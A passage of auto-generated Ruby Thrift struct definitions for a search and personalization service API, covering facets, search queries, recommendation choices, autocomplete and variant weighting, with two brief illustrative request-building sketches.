def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>fieldName</dt>
# <dd>name of the field to get facet for</dd>
#
# <dt>numerical</dt>
# <dd>whether the facet is numerical</dd>
#
# <dt>range</dt>
# <dd>whether the facet is range facet</dd>
#
# <dt>maxCount</dt>
# <dd>maximum number of facets to return by given order, -1 for all of them</dd>
#
# <dt>minPopulation</dt>
# <dd>minimum facet population to return</dd>
#
# <dt>dateRangeGap</dt>
# <dd>if the corresponding field is date then the gap to be used for facet</dd>
#
# <dt>sortOrder</dt>
# <dd>sort order</dd>
#
# <dt>sortAscending</dt>
# <dd>whether the sort should be done ascending</dd>
#
# <dt>selectedValues</dt>
# <dd>values selected from the facet.</dd>
# <dd>Note that results will be filtered by these values, but the corresponding
# FacetResponse is as if this filter was not applied</dd>
#
# <dt>andSelectedValues</dt>
# <dd>whether selectedValues should be considered in AND logic, meaning filter
# out those that don't contain ALL selected values - default is OR - include
# those containing any of selectedValue</dd>
#
# <dt>boundsOnly</dt>
# <dd>only affects numeric range facets. will always return one FacetValue with rangeFromInclusive and rangeToExclusive
# set according to the actual minimum and maximum value</dd>
# </dl>
class FacetRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
NUMERICAL = 2
RANGE = 3
MAXCOUNT = 4
MINPOPULATION = 5
DATERANGEGAP = 6
SORTORDER = 7
SORTASCENDING = 8
SELECTEDVALUES = 90
ANDSELECTEDVALUES = 100
BOUNDSONLY = 110
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
NUMERICAL => {:type => ::Thrift::Types::BOOL, :name => 'numerical'},
RANGE => {:type => ::Thrift::Types::BOOL, :name => 'range'},
MAXCOUNT => {:type => ::Thrift::Types::I32, :name => 'maxCount', :default => -1},
MINPOPULATION => {:type => ::Thrift::Types::I32, :name => 'minPopulation', :default => 1},
DATERANGEGAP => {:type => ::Thrift::Types::I32, :name => 'dateRangeGap', :enum_class => ::DateRangeGap},
SORTORDER => {:type => ::Thrift::Types::I32, :name => 'sortOrder', :enum_class => ::FacetSortOrder},
SORTASCENDING => {:type => ::Thrift::Types::BOOL, :name => 'sortAscending'},
SELECTEDVALUES => {:type => ::Thrift::Types::LIST, :name => 'selectedValues', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetValue}},
ANDSELECTEDVALUES => {:type => ::Thrift::Types::BOOL, :name => 'andSelectedValues', :default => false},
BOUNDSONLY => {:type => ::Thrift::Types::BOOL, :name => 'boundsOnly', :default => false}
}
def struct_fields; FIELDS; end
def validate
unless @dateRangeGap.nil? || ::DateRangeGap::VALID_VALUES.include?(@dateRangeGap)
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Invalid value of field dateRangeGap!')
end
unless @sortOrder.nil? || ::FacetSortOrder::VALID_VALUES.include?(@sortOrder)
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Invalid value of field sortOrder!')
end
end
::Thrift::Struct.generate_accessors self
end
# field to be used for sorting
class SortField
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
REVERSE = 2
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
REVERSE => {:type => ::Thrift::Types::BOOL, :name => 'reverse'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>indexId</dt>
# <dd>indexId to be used for search</dd>
#
# <dt>language</dt>
# <dd>language for localization</dd>
#
# <dt>queryText</dt>
# <dd>main search query</dd>
#
# <dt>filters</dt>
# <dd>list of filters to apply</dd>
#
# <dt>orFilters</dt>
# <dd>whether boolean OR should be aplied to the given list of filters if false
# boolean AND will be applied</dd>
#
# <dt>facetRequests</dt>
# <dd>list of facets to be returned</dd>
#
# <dt>sortFields</dt>
# <dd>optional list of sort fields for hardcoded sorting. If not given,
# relevance sort order will be used</dd>
#
# <dt>offset</dt>
# <dd>from which hit to return result</dd>
#
# <dt>hitCount</dt>
# <dd>how many hits to return</dd>
#
# <dt>returnFields</dt>
# <dd>which index fields to be returned</dd>
#
# <dt>groupBy</dt>
# <dd>field name of the field to do grouping by</dd>
#
# <dt>groupFacets</dt>
# <dd>whether facets counts should contain number of groups</dd>
#
# <dt>groupItemsCount</dt>
# <dd>how many hits in each group to return</dd>
#
# <dt>groupItemsSort</dt>
# <dd>how to sort items within the group, default is score</dd>
#
# <dt>groupItemsSortAscending</dt>
# <dd>whether to sort items within the group ascending</dd>
#
# <dt>hitsGroupsAsHits</dt>
# <dd>if true, will return hitsGroups as hits in the response</dd>
# </dl>
class SimpleSearchQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 1
LANGUAGE = 2
QUERYTEXT = 3
FILTERS = 4
ORFILTERS = 5
FACETREQUESTS = 6
SORTFIELDS = 7
OFFSET = 8
HITCOUNT = 9
RETURNFIELDS = 10
GROUPBY = 20
GROUPFACETS = 30
GROUPITEMSCOUNT = 40
GROUPITEMSSORT = 50
GROUPITEMSSORTASCENDING = 60
HITSGROUPSASHITS = 70
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
LANGUAGE => {:type => ::Thrift::Types::STRING, :name => 'language'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
FILTERS => {:type => ::Thrift::Types::LIST, :name => 'filters', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Filter}},
ORFILTERS => {:type => ::Thrift::Types::BOOL, :name => 'orFilters'},
FACETREQUESTS => {:type => ::Thrift::Types::LIST, :name => 'facetRequests', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetRequest}},
SORTFIELDS => {:type => ::Thrift::Types::LIST, :name => 'sortFields', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SortField}},
OFFSET => {:type => ::Thrift::Types::I64, :name => 'offset'},
HITCOUNT => {:type => ::Thrift::Types::I32, :name => 'hitCount'},
RETURNFIELDS => {:type => ::Thrift::Types::LIST, :name => 'returnFields', :element => {:type => ::Thrift::Types::STRING}},
GROUPBY => {:type => ::Thrift::Types::STRING, :name => 'groupBy'},
GROUPFACETS => {:type => ::Thrift::Types::BOOL, :name => 'groupFacets', :default => true},
GROUPITEMSCOUNT => {:type => ::Thrift::Types::I32, :name => 'groupItemsCount', :default => 1},
GROUPITEMSSORT => {:type => ::Thrift::Types::STRING, :name => 'groupItemsSort', :default => %q"score"},
GROUPITEMSSORTASCENDING => {:type => ::Thrift::Types::BOOL, :name => 'groupItemsSortAscending', :default => false},
HITSGROUPSASHITS => {:type => ::Thrift::Types::BOOL, :name => 'hitsGroupsAsHits', :default => false}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>indexId</dt>
# <dd>id of the index to fetch context item data from</dd>
#
# <dt>fieldName</dt>
# <dd>the field name of the item's unique identifier within the items index</dd>
# <dd>for example: 'sku' for items 'products'</dd>
#
# <dt>contextItemId</dt>
# <dd>actual item's identifier</dd>
# <dd>for example: actual sku of the product</dd>
#
# <dt>role</dt>
# <dd>role of the item within the context, used to address the item in the
# recommendation script.</dd>
# <dd>for example: 'main product' for recommendations within product detail
# page</dd>
# </dl>
class ContextItem
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 1
FIELDNAME = 2
CONTEXTITEMID = 3
ROLE = 4
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
CONTEXTITEMID => {:type => ::Thrift::Types::STRING, :name => 'contextItemId'},
ROLE => {:type => ::Thrift::Types::STRING, :name => 'role'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>choiceId</dt>
# <dd>personalization choice identifier</dd>
#
# <dt>simpleSearchQuery</dt>
# <dd>search query in a case of recommendation and search inquiries</dd>
#
# <dt>contextItems</dt>
# <dd>context items for recommendations</dd>
#
# <dt>minHitCount</dt>
# <dd>minimal hit count to return for recommendations.</dd>
# <dd>if higher priority recommendation strategy yields less results, next
# strategy is tried</dd>
#
# <dt>excludeVariantIds</dt>
# <dd>set of variantIds to be excluded from result, has no effect if null or empty</dd>
#
# <dt>includeVariantIds</dt>
# <dd>set of variantIds to be included in the result, has no effect if null or empty</dd>
#
# <dt>scope</dt>
# <dd>choice source to be used</dd>
#
# <dt>withRelaxation</dt>
# <dd>if search relaxation should be used</dd>
# </dl>
class ChoiceInquiry
include ::Thrift::Struct, ::Thrift::Struct_Union
CHOICEID = 1
SIMPLESEARCHQUERY = 2
CONTEXTITEMS = 3
MINHITCOUNT = 4
EXCLUDEVARIANTIDS = 5
SCOPE = 6
WITHRELAXATION = 70
WITHSEMANTICFILTERING = 80
INCLUDEVARIANTIDS = 90
FIELDS = {
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
SIMPLESEARCHQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'simpleSearchQuery', :class => ::SimpleSearchQuery},
CONTEXTITEMS => {:type => ::Thrift::Types::LIST, :name => 'contextItems', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ContextItem}},
MINHITCOUNT => {:type => ::Thrift::Types::I32, :name => 'minHitCount'},
EXCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'excludeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
SCOPE => {:type => ::Thrift::Types::STRING, :name => 'scope', :default => %q"system_rec"},
WITHRELAXATION => {:type => ::Thrift::Types::BOOL, :name => 'withRelaxation', :default => false},
WITHSEMANTICFILTERING => {:type => ::Thrift::Types::BOOL, :name => 'withSemanticFiltering', :default => false},
INCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'includeVariantIds', :element => {:type => ::Thrift::Types::STRING}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# parameters of request context. Usually browser, platform, etc.
class RequestContext
include ::Thrift::Struct, ::Thrift::Struct_Union
PARAMETERS = 1
FIELDS = {
PARAMETERS => {:type => ::Thrift::Types::MAP, :name => 'parameters', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRING}}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# unique identifier of the customer
class UserRecord
include ::Thrift::Struct, ::Thrift::Struct_Union
USERNAME = 1
APIKEY = 10
APISECRET = 20
FIELDS = {
USERNAME => {:type => ::Thrift::Types::STRING, :name => 'username'},
APIKEY => {:type => ::Thrift::Types::STRING, :name => 'apiKey'},
APISECRET => {:type => ::Thrift::Types::STRING, :name => 'apiSecret'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>profileId</dt>
# <dd>profile (visitor) identifier</dd>
#
# <dt>inquiries</dt>
# <dd>list of inquiries to be executed sequentially.</dd>
# <dd>Inquiries with higher index may depend from those with lower index.</dd>
#
# <dt>requestContext</dt>
# <dd>context of the request</dd>
# </dl>
class ChoiceRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 1
PROFILEID = 2
INQUIRIES = 3
REQUESTCONTEXT = 4
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
INQUIRIES => {:type => ::Thrift::Types::LIST, :name => 'inquiries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ChoiceInquiry}},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
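
# Assembly sketch (illustrative): a minimal personalization request built from
# the structs above; the account name, index id, choice id and query are
# placeholders.
request = ChoiceRequest.new(
  userRecord: UserRecord.new(username: 'account-name'),
  profileId: 'visitor-123',
  inquiries: [
    ChoiceInquiry.new(
      choiceId: 'search',
      simpleSearchQuery: SimpleSearchQuery.new(indexId: 'my-index', language: 'en',
                                               queryText: 'shoes', hitCount: 10)
    )
  ],
  requestContext: RequestContext.new(parameters: {})
)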
# <dl>
# <dt>fieldName</dt>
# <dd>name of the facet field</dd>
#
# <dt>values</dt>
# <dd>list of facet values</dd>
# </dl>
class FacetResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
VALUES = 2
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
VALUES => {:type => ::Thrift::Types::LIST, :name => 'values', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetValue}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# item found
#
# <dl>
# <dt>values</dt>
# <dd>map containing name of the field and list of values as strings</dd>
# <dd>if index contains no value for a field, empty array will be returned.</dd>
#
# <dt>score</dt>
# <dd>index score of the hit</dd>
#
# <dt>scenarioId</dt>
# <dd>source scenarioId in case of mixed recommendations modes</dd>
# </dl>
class Hit
include ::Thrift::Struct, ::Thrift::Struct_Union
VALUES = 1
SCORE = 2
SCENARIOID = 30
FIELDS = {
VALUES => {:type => ::Thrift::Types::MAP, :name => 'values', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRING}}},
SCORE => {:type => ::Thrift::Types::DOUBLE, :name => 'score'},
SCENARIOID => {:type => ::Thrift::Types::STRING, :name => 'scenarioId'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# grouped item found
#
# <dl>
# <dt>groupValue</dt>
# <dd>value of the groupBy field</dd>
#
# <dt>totalHitCount</dt>
# <dd>total hits count within the group</dd>
#
# <dt>hits</dt>
# <dd>group hits</dd>
# </dl>
class HitsGroup
include ::Thrift::Struct, ::Thrift::Struct_Union
GROUPVALUE = 10
TOTALHITCOUNT = 20
HITS = 30
FIELDS = {
GROUPVALUE => {:type => ::Thrift::Types::STRING, :name => 'groupValue'},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'},
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Hit}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>hits</dt>
# <dd>list of hits found for given SimpleSearchQuery</dd>
#
# <dt>facetResponses</dt>
# <dd>list of requested facets or null if none requested</dd>
#
# <dt>totalHitCount</dt>
# <dd>total number of hits; -1 in case of mixed recommendation strategy</dd>
#
# <dt>queryText</dt>
# <dd>relaxation query text for relaxation results or requested queryText for a
# regular SearchResult</dd>
#
# <dt>hitsGroups</dt>
# <dd>grouped hits; not null when corresponding SimplSearchQuery has
# groupBy!=null </dd>
# </dl>
class SearchResult
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 1
FACETRESPONSES = 2
TOTALHITCOUNT = 3
QUERYTEXT = 40
HITSGROUPS = 50
FIELDS = {
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Hit}},
FACETRESPONSES => {:type => ::Thrift::Types::LIST, :name => 'facetResponses', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetResponse}},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
HITSGROUPS => {:type => ::Thrift::Types::LIST, :name => 'hitsGroups', :element => {:type => ::Thrift::Types::STRUCT, :class => ::HitsGroup}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class SearchRelaxation
include ::Thrift::Struct, ::Thrift::Struct_Union
SUGGESTIONSRESULTS = 10
SUBPHRASESRESULTS = 20
FIELDS = {
SUGGESTIONSRESULTS => {:type => ::Thrift::Types::LIST, :name => 'suggestionsResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}},
SUBPHRASESRESULTS => {:type => ::Thrift::Types::LIST, :name => 'subphrasesResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>variantId</dt>
# <dd>id of the personalized variant</dd>
#
# <dt>scenarioId</dt>
# <dd>scenario identifier used to produce recommendation result or search
# result personalization</dd>
#
# <dt>searchResult</dt>
# <dd>result of the search request for recommendations and search requests</dd>
#
# <dt>searchResultTitle</dt>
# <dd>recommendation's result title localized in language requested in
# corresponding SimpleSearchQuery</dd>
#
# <dt>searchRelaxation</dt>
# <dd>When the service considers queryText invalid, it will evaluate and return
# relaxations if it is requested in corresponding ChoiceInquiry and if
# relaxations could be found.</dd>
# <dd>Note that original query still could yield some results; it is up to the
# client to decide whether searchRelaxations should be used (with displaying
# appropriate message) or not.</dd>
# </dl>
class Variant
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTID = 1
SCENARIOID = 2
SEARCHRESULT = 3
SEARCHRESULTTITLE = 4
SEARCHRELAXATION = 50
SEMANTICFILTERINGRESULTS = 60
FIELDS = {
VARIANTID => {:type => ::Thrift::Types::STRING, :name => 'variantId'},
SCENARIOID => {:type => ::Thrift::Types::STRING, :name => 'scenarioId'},
SEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'searchResult', :class => ::SearchResult},
SEARCHRESULTTITLE => {:type => ::Thrift::Types::STRING, :name => 'searchResultTitle'},
SEARCHRELAXATION => {:type => ::Thrift::Types::STRUCT, :name => 'searchRelaxation', :class => ::SearchRelaxation},
SEMANTICFILTERINGRESULTS => {:type => ::Thrift::Types::LIST, :name => 'semanticFilteringResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# list of personalized variants. Item's index corresponds to the index of the
# ChoiceInquiry
class ChoiceResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTS = 1
FIELDS = {
VARIANTS => {:type => ::Thrift::Types::LIST, :name => 'variants', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class ProfilePropertyValue
include ::Thrift::Struct, ::Thrift::Struct_Union
PROFILEID = 1
PROPERTYNAME = 2
PROPERTYVALUE = 3
CONFIDENCE = 4
FIELDS = {
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
PROPERTYNAME => {:type => ::Thrift::Types::STRING, :name => 'propertyName'},
PROPERTYVALUE => {:type => ::Thrift::Types::STRING, :name => 'propertyValue'},
CONFIDENCE => {:type => ::Thrift::Types::I32, :name => 'confidence'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class ProfileContext
include ::Thrift::Struct, ::Thrift::Struct_Union
PROFILEID = 1
REQUESTCONTEXT = 2
FIELDS = {
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>choiceInquiry</dt>
# <dd><b>deprecated</b> - use choiceInquiries instead.</dd>
# <dd>If choiceInquiries is given this field will be ignored</dd>
#
# <dt>choiceInquiries</dt>
# <dd>list of ChoiceInquiries to be executed sequentially.</dd>
# <dd>Note that list items can depend of items before in list</dd>
#
# <dt>requestContext</dt>
# <dd><b>deprecated</b> - use profileContexts instead.</dd>
#
# <dt>profileIds</dt>
# <dd><b>deprecated</b> - use profileContexts instead.</dd>
# </dl>
class BatchChoiceRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 1
CHOICEINQUIRY = 2
REQUESTCONTEXT = 3
PROFILEIDS = 4
CHOICEINQUIRIES = 5
PROFILECONTEXTS = 6
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
CHOICEINQUIRY => {:type => ::Thrift::Types::STRUCT, :name => 'choiceInquiry', :class => ::ChoiceInquiry},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext},
PROFILEIDS => {:type => ::Thrift::Types::LIST, :name => 'profileIds', :element => {:type => ::Thrift::Types::STRING}},
CHOICEINQUIRIES => {:type => ::Thrift::Types::LIST, :name => 'choiceInquiries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ChoiceInquiry}},
PROFILECONTEXTS => {:type => ::Thrift::Types::LIST, :name => 'profileContexts', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ProfileContext}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>variants</dt>
# <dd><b>deprecated</b> - contains non-null value only if
# corresponding BatchChoiceRequest had only one ChoiceInquiry</dd>
#
# <dt>selectedVariants</dt>
# <dd>outer list corresponds to profileIds given in BatchChoiceRequest, while
# inner list corresponds to list of ChoiceInquiries from BatchChoiceRequest</dd>
# </dl>
class BatchChoiceResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTS = 1
SELECTEDVARIANTS = 2
FIELDS = {
VARIANTS => {:type => ::Thrift::Types::LIST, :name => 'variants', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}},
SELECTEDVARIANTS => {:type => ::Thrift::Types::LIST, :name => 'selectedVariants', :element => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteHit
include ::Thrift::Struct, ::Thrift::Struct_Union
SUGGESTION = 11
HIGHLIGHTED = 21
SEARCHRESULT = 31
SCORE = 41
FIELDS = {
SUGGESTION => {:type => ::Thrift::Types::STRING, :name => 'suggestion'},
HIGHLIGHTED => {:type => ::Thrift::Types::STRING, :name => 'highlighted'},
SEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'searchResult', :class => ::SearchResult},
SCORE => {:type => ::Thrift::Types::DOUBLE, :name => 'score'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 11
LANGUAGE = 21
QUERYTEXT = 31
SUGGESTIONSHITCOUNT = 41
HIGHLIGHT = 51
HIGHLIGHTPRE = 61
HIGHLIGHTPOST = 71
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
LANGUAGE => {:type => ::Thrift::Types::STRING, :name => 'language'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
SUGGESTIONSHITCOUNT => {:type => ::Thrift::Types::I32, :name => 'suggestionsHitCount'},
HIGHLIGHT => {:type => ::Thrift::Types::BOOL, :name => 'highlight'},
HIGHLIGHTPRE => {:type => ::Thrift::Types::STRING, :name => 'highlightPre', :default => %q"<em>"},
HIGHLIGHTPOST => {:type => ::Thrift::Types::STRING, :name => 'highlightPost', :default => %q"</em>"}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 11
SCOPE = 21
CHOICEID = 31
PROFILEID = 41
REQUESTCONTEXT = 51
EXCLUDEVARIANTIDS = 61
AUTOCOMPLETEQUERY = 71
SEARCHCHOICEID = 81
SEARCHQUERY = 91
INCLUDEVARIANTIDS = 101
PROPERTYQUERIES = 110
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
SCOPE => {:type => ::Thrift::Types::STRING, :name => 'scope', :default => %q"system_rec"},
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext},
EXCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'excludeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
AUTOCOMPLETEQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'autocompleteQuery', :class => ::AutocompleteQuery},
SEARCHCHOICEID => {:type => ::Thrift::Types::STRING, :name => 'searchChoiceId'},
SEARCHQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'searchQuery', :class => ::SimpleSearchQuery},
INCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'includeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
#PROPERTYQUERIES => {:type => ::Thrift::Types::LIST, :name => 'propertyQueries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyQuery}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
NAME = 11
HITCOUNT = 21
EVALUATETOTAL = 31
FIELDS = {
NAME => {:type => ::Thrift::Types::STRING, :name => 'name'},
HITCOUNT => {:type => ::Thrift::Types::I32, :name => 'hitCount'},
EVALUATETOTAL => {:type => ::Thrift::Types::BOOL, :name => 'evaluateTotal'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyResult
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 11
NAME = 21
FIELDS = {
# HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyHit}},
NAME => {:type => ::Thrift::Types::STRING, :name => 'name'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyHit
include ::Thrift::Struct, ::Thrift::Struct_Union
VALUE = 11
LABEL = 21
TOTALHITCOUNT = 31
FIELDS = {
VALUE => {:type => ::Thrift::Types::STRING, :name => 'value'},
LABEL => {:type => ::Thrift::Types::STRING, :name => 'label'},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 11
PREFIXSEARCHRESULT = 21
PROPERTYRESULTS = 31
FIELDS = {
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteHit}},
PREFIXSEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'prefixSearchResult', :class => ::SearchResult},
PROPERTYRESULTS => {:type => ::Thrift::Types::LIST, :name => 'propertyResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteRequestBundle
include ::Thrift::Struct, ::Thrift::Struct_Union
REQUESTS = 11
FIELDS = {
REQUESTS => {:type => ::Thrift::Types::LIST, :name => 'requests', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteRequest}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteResponseBundle
include ::Thrift::Struct, ::Thrift::Struct_Union
RESPONSES = 11
FIELDS = {
RESPONSES => {:type => ::Thrift::Types::LIST, :name => 'responses', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteResponse}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# Request object for changing the choice, that is changing possible variants
# or their random distribution
class ChoiceUpdateRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 11
CHOICEID = 21
VARIANTIDS = 31
FIELDS = {
# user record identifying the client
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
# Identifier of the choice to be changed. If it is not given, a new choice will be created
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
# Map containing variant identifier and corresponding positive integer weight.
# If for a choice there is no learned rule which can be applied, weights of
# variants will be used for variants random distribution.
# Higher weight makes corresponding variant more probable.
VARIANTIDS => {:type => ::Thrift::Types::MAP, :name => 'variantIds', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::I32}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
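
# Weighting sketch (illustrative): as the comments above describe, variantIds
# maps variant identifiers to positive integer weights used for the random
# distribution; the names and weights here are made up.
update = ChoiceUpdateRequest.new(
  userRecord: UserRecord.new(username: 'account-name'),
  choiceId: 'banner_test',
  variantIds: { 'variant_a' => 3, 'variant_b' => 1 } # variant_a roughly 3x as likely
)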
# Server response for one ChoiceUpdateRequest
class ChoiceUpdateResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
CHOICEID = 11
FIELDS = {
      # Identifier of the changed choice. If no id is given in the corresponding
      # ChoiceUpdateRequest, a new choice (and a new id) will be created and returned.
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class P13nServiceException < ::Thrift::Exception
include ::Thrift::Struct, ::Thrift::Struct_Union
def initialize(message=nil)
super()
self.message = message
end
MESSAGE = 1
FIELDS = {
MESSAGE => {:type => ::Thrift::Types::STRING, :name => 'message'}
}
def struct_fields; FIELDS; end
